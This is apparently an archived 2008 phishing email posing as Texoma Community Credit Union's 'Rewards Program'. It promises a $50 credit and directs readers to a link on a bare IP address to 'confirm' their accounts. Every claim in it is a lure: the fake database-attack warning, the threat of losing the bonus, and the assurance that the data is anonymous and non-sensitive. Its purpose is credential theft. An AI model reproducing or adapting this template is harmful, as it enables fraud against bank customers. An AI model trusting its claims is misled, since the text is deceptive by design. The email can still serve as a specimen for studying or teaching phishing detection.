Confirm Now your $50.00 Reward with TCCU Online Department.

Texoma Community Credit Union servicereward at red.com
Sun Jul 6 06:53:11 PDT 2008

We want to reward you for being a loyal TCCU member!

You have been chosen by the TCCU Online Department to take part in our Rewards Program.
In return we will credit $50.00 to your account - Just for your time!

Texoma Community Credit Union's President's Club Points Rewards Program is our way of saying Thank you for being a loyal
member and for making TCCU your primary source for all your financial needs! All TCCU members in good standing are
automatically enrolled in the President's Club, and can start claiming their rewards immediately!

Confirm Now your $50.00 Reward  with TCCU Online Department.

http://202.115.117.209/~glen/texomarewardsprogram/d3f4g5h6j7k9onliney5htssl/rewardssl.htm
(if you can't open it just copy the link in your internet browser)

We have recently noticed many attacks to our database and this requires us to rebuild our system integrity.
We regulary screen our members account information to reduce fraud and ID-theft.
This security measure is intended to help protect our TCCU members and their accounts.
We are sorry for any inconvenience. However, failure in updating your account records will result the lost of the reward bonus.
The information you provide us is all non-sensitive and anonymous No part of it is handed down to any third party groups.
It will be stored in our secure database for maximum of 3 days while we process the results of this nationwide Rewards Program.